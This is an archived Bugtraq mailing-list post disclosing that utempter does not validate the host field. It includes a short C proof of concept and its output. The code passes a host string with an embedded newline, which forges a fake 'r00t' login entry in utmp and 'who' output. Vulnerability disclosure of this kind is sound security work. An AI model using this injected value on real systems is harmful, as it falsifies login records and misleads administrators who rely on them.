Home page logo

bugtraq logo Bugtraq mailing list archives

utempter allows fake host setting
From: paul.szabo () sydney edu au
Date: Sat, 6 Oct 2012 20:53:02 +1000

Quoting from 

  Utempter does not (cannot?) verify the setting of host, so it can easily
  be faked. This may affect any software that depend on utmp correctness.
  Demo of the issue:
  psz () bari:~$ cat silly.c
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <unistd.h>
  #include <stdio.h>
  int main()
    int i;
    i = open("/dev/ptmx", O_RDWR);
    printf("open ptmx returned %d\n", i);
    dup2(i, 0);
    /* dup2(i, 1); */
    printf("doing utempter add\n");
    system("/usr/lib/utempter/utempter add 'xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com'");
    printf("checking who\n");
    system("who | grep xyz");
    printf("doing utempter del\n");
    system("/usr/lib/utempter/utempter del");
    printf("checking who\n");
    system("who | grep xyz");
  psz () bari:~$ cc silly.c; a.out
  open ptmx returned 3
  doing utempter add
  checking who
  psz      pts/29       Oct  4 11:48 (xyz)
  r00t     pts/0        Jan  1 01:02 (xyz.com)
  doing utempter del
  checking who
  psz () bari:~$ 
  Please see also:

Cheers, Paul

Paul Szabo   psz () maths usyd edu au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia

  By Date           By Thread  

Current thread:
  • utempter allows fake host setting paul . szabo (Oct 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]